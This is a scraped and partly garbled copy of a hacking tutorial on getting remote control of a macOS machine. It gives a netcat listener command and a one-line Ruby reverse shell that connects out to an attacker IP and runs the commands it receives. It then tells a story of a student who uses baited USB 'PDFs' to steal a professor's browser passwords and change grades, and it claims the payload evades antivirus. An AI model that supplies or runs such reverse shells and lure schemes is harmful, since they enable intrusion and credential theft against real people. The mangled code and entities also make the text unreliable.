قالب وردپرس درنا توس
Home / Tips and Tricks / How to Hack a MacBook with a Ruby Command «Null Byte :: WonderHowTo

How to Hack a MacBook with a Ruby Command «Null Byte :: WonderHowTo



With just one line of Ruby code embedded in a fake PDF file, a hacker can remotely control any Mac computer anywhere in the world. Building the command is the easy part, but the goal of opening the code is where a hacker needs to get creative.

Ruby is just one way to get into a computer running macOS (formerly Mac OS X) to become full remote control. We've covered single-line commands that used Python, Tclsh, or Bash, but some of the most popular reporting frameworks are written in Ruby, so it's a classic option for beginners.

What is Ruby?

When comes up with Ruby, his creator, Yukihiro "Matz" Matsumoto, wanted a programming language that was more powerful than Perl, more object oriented than Python and simple in appearance with the potential for very complex functionalities.

Much Ruby's growth can be attributed to Ruby on Rails, a popular, fully-featured, server-side web application framework that makes it easy to create websites. For these reasons, Ruby is one of the most popular programming languages ​​in the world and is included by default in all Macs.

Based on your programming experience as a penetration tester, Ruby can be a preferred language for tactical missions. There are no major advantages or disadvantages to using Ruby over Python, Tclsh, or Bash as a backdoor for a Mac, so Ruby is just as good an option as any other.

Step 1
: Starting a Netcat Listener

To use Ruby as Open a terminal in Kali (or any Unix-based operating system with Netcat installed) and use the following Netcat command to to start a listener. This is the location where the macOS target device connects when the Ruby command is executed.

  nc -v -l -p 9999 
  • Netcat opens a listening port ( -l ) on all available interfaces
  • If you are working on a local network, the netcat listener is available at your local address (eg 192.168.0.X ). If the listener is started on a virtual private server (VPS), be sure to use the IP address of your VPS in future Ruby commands.
  • The port ( -p ) number ( 9999 ) is arbitrary and can be changed.
  • The verbosity argument ( -v ) argument is important here. If you are not connecting to the target MacBook, Mac Pro, or other computer running macOS, the Netcat terminal will not change. To provide some kind of indication that the payload has been executed successfully, enable Verbosity.

Step 2: Use Ruby to create a backdoor

Run it on the MacOS device to create a backdoor for the Netcat listener:

  ruby ​​- rsocket -e " c = TCPSocket.new (? 1.2.3.4 ?,? 3999), while (cmd = c.gets); IO.popen (cmd,? r & # 39; ;) {| io | c.print io.read} end "

This above stroke creates a TCP socket ( TCPSocket.new ) and a while loop ( while … end ), which states "while data is in place, assign it cmd execute the input as a shell command and print it back into our terminal ( IO.popen ( cmd, & # 39; r) [|io|cprintioread}). "In essence, we tell Ruby that we're executing the command we're passing, interpreting the output and send it back to us … over and over again until we have disconnected from the macOS device ben.

Remember to change the IP address ( 1.2.3.4 ) and the port number ( 9999 ) must match the Netcat listener created in the previous step has been. This can be a local network IP address or IP address of your VPS. On the attacker's system (as shown below), the Netcat terminal will display a new connection.

  nc -v -l -p 9999
listen [any] 9999 ...
Link to [192.168.1.55] from (UNKNOWN) [192.168.1.31] 50328 

Situational awareness and attacks after exploitation may begin. If this Ruby command is embedded in a trojanized PDF file and is executed by the target, you will not have root access. In this case, there are several ways to get access rights. If Ruby was used to physically open a macOS device, you have a root directory and can begin storing passwords stored in the target's web browsers. In any case, this Ruby command will completely bypass antivirus software like Avast and AVG.

Step 3: Using a Social Engineering Attack

Such payload data can be executed with a USB Rubby Ducky or simply be embedded in AppleScripts and sent to victims. There are many ways to accomplish the payload, but you must use your social engineering skills to get them to open them.

Just as I did with the Python, Tclsh, or Bash one-liners, this is a short story that illustrates how easy it would be for a hacker to share a trojanized file, in this case an AppleScript. While this story is completely fictional and hypothetical, I tested the featured Ruby payload against macOS High Sierra, where Avast Antivirus software was installed.

The College Professor & the Fake PDF

A student at a prestigious university failed the semester and wanted to change their exam grades to pass the course. The university website used by professors needed an email address and password to change students' grades and information. The student therefore decided to hack his professor to get their credentials and change their grades. To do this, the student has created multiple fake PDFs using AppleScript and embedded one Ruby payload each.

  ruby ​​-rsocket -e "c = TCPSocket.new (& # 39; 1.2.3.4 & 39 ;, & 39; 9999); while (cmd = c.gets); IO. popen (cmd, & # 39; s) {| io | c.print io.read} end "

The student hoped to be able to save passwords stored in the professor's web browser later on. Your login details [19659002] After the fake PDFs were put on the USB stick, the student came to school one hour in front of the other and placed the USB with a handwritten note on the professor's desk.

Professor,

According to Professor Jessica Barker's request, on the USB is the route for this year's academic excursion and bills for spending. (19659002) ~ David Pacios

The student signed the grade as another professor, who was probably involved in the university's annual field trip, to create a strong sense of legitimacy in the message.

Upon arrival, the professor noticed the USB and the reference on her desk. After plugging in the USB stick and double-clicking on the PDF files to check them, nothing seemed to happen as the Ruby payloads silently ran in the background. Confused, the professor opened his mail application and wrote an e-mail message to David.

Hey David,

The PDFs on this USB device do not seem to open. Can you try to email me this? Many Thanks.

~ Hacked Professor

After getting remote access to the MacBook, the student erased the passwords stored in the Firefox browser to learn the professor's login password and changed his exam results to a passed grade One-Liner Payloads …

This is just another example of how hackers can compromise MacOS devices with a single command – but I'm not done with a command yet. In future articles I will continue to show how to use programs built into MacOS to give hackers full remote access.

Cover photo of Startup Photos / PEXELS

Source link